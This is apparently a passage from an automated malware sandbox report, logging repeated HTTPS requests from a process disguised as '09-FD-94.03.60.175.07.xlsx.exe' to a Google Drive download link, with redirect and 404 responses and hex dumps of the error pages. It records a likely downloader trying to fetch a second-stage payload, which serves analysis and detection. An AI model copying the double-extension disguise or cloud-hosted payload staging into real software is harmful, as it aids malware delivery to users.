                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:54 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:53 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-N_iVBBLdnM8erTNw3PuiqQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        27192.168.2.849793142.250.181.1443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:55 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:56 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC4cw1ma4l2OPdRW8fIHKqb0UyXyALYjuHmlKrtbbgEgLdzGSuFI2krHbmmYQfbeKo3_
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:56 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-tyiYeSxCHk1zei-kV--uFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:56 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 2d 38 41 62 37 30 6c 4d 56 37 39 6c 50 6e 52 43 57 71 69 46 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="W-8Ab70lMV79lPnRCWqiFQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        28192.168.2.849800172.217.19.174443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:58 UTC417OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:59 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:59 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-7kGhdldxz3Z8n7qoHS8AKg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        29192.168.2.849806142.250.181.1443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:59:01 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:59:02 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC4KZ4odGlUd1G_LJyB_j53JW4-iYxCcwcMKaPELOkFSjyzfEAX-yHOXM8hP6LQLQMTS
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:01 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-ywuEZEngkIzpTJnY2xpr8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:59:02 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 57 7a 36 4c 36 48 64 61 41 56 74 75 76 52 72 69 75 36 59 47 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tWz6L6HdaAVtuvRriu6YGA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        30192.168.2.849812172.217.19.174443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:59:03 UTC417OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:59:04 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:04 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-E_Xhnoo8R4778TZGKlh0Qg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        31192.168.2.849822142.250.181.1443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:59:06 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:59:07 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC6bP9KYGOA7GuGR_z2HfohlK_Nb9MWv3lb-qxFTmX8aVCz35umiZkK_ZloBPAE-5b8x
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:07 GMT
                                                        Content-Security-Policy: script-src 'nonce-zEulElOHZOtj3UQvRdyyUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:59:07 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 33 59 42 6f 47 31 51 52 30 43 53 72 4b 67 72 54 73 35 62 4e 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="l3YBoG1QR0CSrKgrTs5bNA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        32192.168.2.849829172.217.19.174443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:59:09 UTC417OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:59:10 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:09 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-Go5HxtbGm_eOwOFf2Yl4pg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        33192.168.2.849835142.250.181.1443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:59:11 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:59:12 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC5ozpAEHkuppLAQ9PArqfo4tPKnWOHgAuXm109UaJIcyanH9G9lPQIOH88n8MyDCsyJ
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:12 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-ODkTMDIOPuSNloouDxM17Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
